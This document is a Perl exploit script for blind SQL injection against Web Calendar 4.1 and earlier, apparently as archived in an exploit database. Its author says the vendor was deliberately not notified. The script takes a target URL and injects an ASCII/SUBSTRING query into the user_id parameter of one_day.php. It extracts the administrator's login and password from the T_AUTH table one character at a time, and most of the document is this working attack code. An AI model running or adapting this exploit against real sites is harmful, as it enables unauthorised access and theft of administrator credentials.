Web Calendar versions 4.1 and below blind SQL injection exploit.
0866b749c97f5d9f9a1dee969135913050291ee328e128627ae542caa88c78ce
#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";
print "-+-- --+-\n";
print "-+-- Discovered && Coded By t0pP8uZz --+-\n";
print "-+-- Discovered On: 24 April 2008 --+-\n";
print "-+-- --+-\n";
print "-+-- Web Calendar suffers from a insecure mysql query --+-\n";
print "-+-- the vendor has not been notified.. and wont be.. --+-\n";
print "-+-- --+-\n";
print "-+-- Exploit tested in ActivePerl --+-\n";
print "-+-- --+-\n";
print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n";
print "\nEnter URL (ie: http://site.com/webcal/): ";
chomp(my $url=<STDIN>);
print "\n\nInjecting Please Wait..\n\n"
my $lop = 1;
my $num = 48;
my $sub = 1;
my $res = undef;
my $content = undef;
while($lop) {
$content = get($url."/one_day.php?user_id=1 AND ASCII(SUBSTRING((SELECT CONCAT(login,char(58),password,char(94)) FROM T_AUTH WHERE role_id=1 LIMIT 0,1),".$sub.",1))=".$num."/*");
if($content !~ /you are not in database/i && $num == 94) { $lop = 0; }
elsif($content !~ /you are not in database/i) { $res .= chr($num); $num = 48; $sub++; print $res."\n"; }
else { $num++; }
}
print "\nExploit Successfull! Admin Details Are: ".$res;
# Coded by t0pP8uZz